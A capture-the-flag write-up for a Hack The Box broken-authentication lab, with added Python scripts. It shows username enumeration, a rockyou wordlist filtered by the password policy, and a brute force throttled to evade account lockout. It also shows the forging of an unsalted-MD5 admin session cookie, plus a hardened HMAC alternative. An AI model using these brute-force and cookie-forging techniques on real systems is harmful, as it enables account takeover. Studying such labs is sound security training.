Solving the HTB CTF — Broken Authentication
2023-07-31 11:19:25 Author: infosecwriteups.com

Before launching any brute-force attack, the first step is to register a legitimate user account: it exposes the registration and password rules, and it gives a known-good login to compare failed attempts against instead of guessing blind.

The application enforces a password policy: the password must start with a capital letter, contain at least one lowercase letter, contain at least one special character ($, # or @), end with a digit, and be at least 20 characters long.

Once the account exists, an attempt to send a message to the "admin" user fails, which indicates that no account with the username "admin" exists.

By using Burp Suite and analyzing the HTTP history, we discover the existence of “guest” and “support” users.

Knowing that "guest" and "support" exist, we try variations of those names to find the username that the login form actually accepts.

Manual guesses such as "us.support", "ussupport" and "supportus" are rejected. Running Burp Intruder with a country-code wordlist (country-codes.txt) as the payload reveals that "support.us" is a valid username.

With the username established, the next step is the password. Rather than throwing the whole of rockyou.txt (14.3 million lines) at the login form, we apply the password policy as filters on the wordlist: first character uppercase, at least one of $, # or @, at least one lowercase letter, and a total length of at least 20 ending in a digit. After the ^[[:upper:]] match, the final grep '.{19,}[0-9]$' requires 19 more characters plus the closing digit, which is exactly the 20-character minimum.

wc -l /usr/share/wordlists/rockyou.txt
14344391 /usr/share/wordlists/rockyou.txt

wc /usr/share/wordlists/rockyou.txt
14344391 14442061 139921497 /usr/share/wordlists/rockyou.txt

grep '^[[:upper:]]' /usr/share/wordlists/rockyou.txt | grep '[$@#]' | grep '[[:lower:]]' | grep -E '.{19,}[0-9]$'
IuBitzik@_B3b3_&*%1990
TrillPrincessMentality#1
Sn@tch01159552520096
[email protected]
Mustang#firebird1995
Mi$un'sbrthd8iz12256
Kaalyah,Jarren,Desmond,Terence#1
[email protected]
[email protected]
Blessedbe1@endofritual2
BisocaBuzau#20061985
Barrackpore.1998@05,1411
B@BYme&my$exiness123
ABCDefgh@BungurBaru17

We run a Burp Intruder attack against the login form (the author used the "Cluster bomb" attack type) with "support.us" as the fixed username and the filtered list as the password payload, limited to 5 concurrent requests with a 30000 millisecond delay between requests. The throttling keeps the attempt rate below the application's lockout threshold, so the account is not locked before the right password has been tried.

The attack identifies "Mustang#firebird1995" as the password for "support.us"; it satisfies every rule of the policy.
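The wordlist filter and the throttled guessing loop above, written out as a Python script. This is an added example, not the author's code: the policy regex is built from the rules stated in the writeup, the sample wordlist is constructed for the demo (its three valid entries are taken from the filtered output shown earlier), and fake_login is a stand-in for the real login request.

```python
import re
import time
from typing import Callable, Iterable, Iterator, Optional

# Password policy as stated in the challenge: first character uppercase, at
# least one lowercase letter, at least one of $ # @, last character a digit,
# and at least 20 characters in total. The lookaheads carry the "contains"
# rules; [A-Z].{18,}[0-9] carries the start/end rules and the 20-char minimum.
POLICY = re.compile(r"^(?=.*[a-z])(?=.*[$#@])[A-Z].{18,}[0-9]$")


def matches_policy(password: str) -> bool:
    """True if every rule of the password policy holds for `password`."""
    return POLICY.fullmatch(password) is not None


def filter_wordlist(lines: Iterable[str]) -> Iterator[str]:
    """Yield the wordlist entries that satisfy the policy.

    Equivalent to the page's grep chain. When reading the real rockyou.txt,
    open it with encoding="latin-1"; the file is not valid UTF-8 throughout.
    """
    for line in lines:
        candidate = line.rstrip("\r\n")
        if matches_policy(candidate):
            yield candidate


def brute_force(
    candidates: Iterable[str],
    try_login: Callable[[str], bool],
    delay_s: float = 30.0,
    sleep: Callable[[float], None] = time.sleep,
) -> Optional[str]:
    """Try candidates in order with a pause between attempts.

    The pause mirrors the 30000 ms Intruder delay: it keeps the request rate
    below the application's lockout threshold. Returns the first password
    that try_login accepts, or None when the list is exhausted.
    """
    for i, candidate in enumerate(candidates):
        if i:
            sleep(delay_s)
        if try_login(candidate):
            return candidate
    return None


# Constructed sample wordlist for the demo: one line per rule violation
# (wrong first character, no lowercase, wrong special character, 19 chars,
# non-digit ending) followed by three entries from the filtered output.
SAMPLE_WORDLIST = """\
password123
mustang#firebird1995
MUSTANG#FIREBIRD1995
Mustang!firebird1995
Mustang#firebird199
Mustang#firebird199x
TrillPrincessMentality#1
Mustang#firebird1995
Blessedbe1@endofritual2
"""


def fake_login(password: str) -> bool:
    """Stand-in for the POST to the login form (constructed for the demo):
    accepts the password the writeup found. Replace it with a real HTTP
    request against the target when using this for an assessment."""
    return password == "Mustang#firebird1995"


if __name__ == "__main__":
    shortlist = list(filter_wordlist(SAMPLE_WORDLIST.splitlines()))
    print("candidates:", shortlist)
    # delay_s=0 only for the demo; keep the 30 s default against a real target
    print("password:", brute_force(shortlist, fake_login, delay_s=0))
```

Against the real wordlist, pass `open("/usr/share/wordlists/rockyou.txt", encoding="latin-1")` to filter_wordlist; the shortlist it produces is the same set the grep chain prints, so the brute force only ever sends a handful of requests.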

After logging in with these credentials, we inspect the login response and find the session cookie values are Base64-encoded. Decoding them gives two pairs: the hash "434990c8a25d2be94863561ae98bd682" corresponds to "support" and "af6172da1f353a9b9bbbaac3ac1ed4c4" to "support.us". Both are unsalted MD5 digests of the plain account names, so they can be recovered with a simple dictionary lookup.

Because the cookie is nothing more than MD5 hashes of predictable values, we can mint the admin version ourselves: MD5("admin.us") = 5e2dea20edeb5de788969bd9d441aaa9 and MD5("admin") = 21232f297a57a5a743894a0e4a801fc3. (The original text calls this step "encrypting"; it is plain hashing, with no secret involved, which is exactly why it can be forged.) Joining the two digests with a colon and Base64-encoding the result produces an admin session cookie that the application accepts in place of a real login:

NWUyZGVhMjBlZGViNWRlNzg4OTY5YmQ5ZDQ0MWFhYTk6MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM=
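Cookie decoding, hash resolution and forging as a Python script, added here for illustration; it is not part of the original writeup. The cookie layout base64(md5(username) ":" md5(role)) is inferred from the values the author quotes (the admin cookie above decodes to exactly that shape), and the signed-cookie functions at the end are my own construction showing what the application should have done instead.

```python
import base64
import binascii
import hashlib
import hmac
import secrets
from typing import Iterable, Optional, Tuple

# Forged admin cookie quoted in the writeup: base64 of "md5(admin.us):md5(admin)".
ADMIN_COOKIE = (
    "NWUyZGVhMjBlZGViNWRlNzg4OTY5YmQ5ZDQ0MWFhYTk6"
    "MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM="
)


def md5_hex(value: str) -> str:
    return hashlib.md5(value.encode()).hexdigest()


def decode_session_cookie(cookie: str) -> Tuple[str, str]:
    """Base64-decode the cookie and split it at the colon into its two
    32-hex-character fields."""
    raw = base64.b64decode(cookie).decode()
    first, second = raw.split(":", 1)
    return first, second


def resolve_md5(digest: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary lookup: which candidate string hashes to `digest`.
    Works because the digests are unsalted MD5 of short, guessable words."""
    for word in candidates:
        if md5_hex(word) == digest:
            return word
    return None


def forge_session_cookie(username: str, role: str) -> str:
    """Build a cookie in the layout inferred from the writeup (assumption):
    base64(md5(username) + ":" + md5(role)). Anyone who knows the layout
    and a valid username can mint a session without knowing a password."""
    raw = f"{md5_hex(username)}:{md5_hex(role)}"
    return base64.b64encode(raw.encode()).decode()


# --- hardened alternative (my own construction, for contrast) -------------
# A session token must not be derivable from public data. Either issue a
# random opaque id stored server-side, or bind the claims to a server secret
# with an HMAC so the client can neither alter nor forge them.

SERVER_KEY = secrets.token_bytes(32)  # generated once, never sent to clients


def issue_signed_cookie(username: str, role: str, key: bytes = SERVER_KEY) -> str:
    payload = f"{username}:{role}".encode()
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest().encode()
    return base64.b64encode(payload + b"|" + tag).decode()


def verify_signed_cookie(cookie: str, key: bytes = SERVER_KEY) -> Optional[Tuple[str, str]]:
    """Return (username, role) if the HMAC tag is valid, else None."""
    try:
        payload, tag = base64.b64decode(cookie).rsplit(b"|", 1)
        expected = hmac.new(key, payload, hashlib.sha256).hexdigest().encode()
        if not hmac.compare_digest(tag, expected):
            return None
        username, role = payload.decode().split(":", 1)
    except (ValueError, binascii.Error):
        return None
    return username, role


def splice_payload(cookie: str, username: str, role: str) -> str:
    """Attacker's attempt against the signed scheme: keep the old tag but
    swap the claims. verify_signed_cookie rejects the result."""
    _payload, tag = base64.b64decode(cookie).rsplit(b"|", 1)
    return base64.b64encode(f"{username}:{role}".encode() + b"|" + tag).decode()


if __name__ == "__main__":
    user_hash, role_hash = decode_session_cookie(ADMIN_COOKIE)
    print("role field resolves to:", resolve_md5(role_hash, ["guest", "support", "admin"]))
    print("forged admin cookie:", forge_session_cookie("admin.us", "admin"))
    print("spliced signed cookie verifies as:",
          verify_signed_cookie(splice_payload(issue_signed_cookie("support.us", "support"), "admin.us", "admin")))
```

The unsalted MD5 scheme fails for two independent reasons: the digests are reversible by dictionary lookup, and nothing in the cookie depends on a secret the client lacks. The HMAC variant fixes the second problem (a random opaque session id would fix both), and the splice_payload helper shows that changing the claims while keeping the old tag is detected.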

Source: https://infosecwriteups.com/solving-the-htb-ctf-broken-authentication-7e8333d618d?source=rss----7b722bfd1b8d--bug_bounty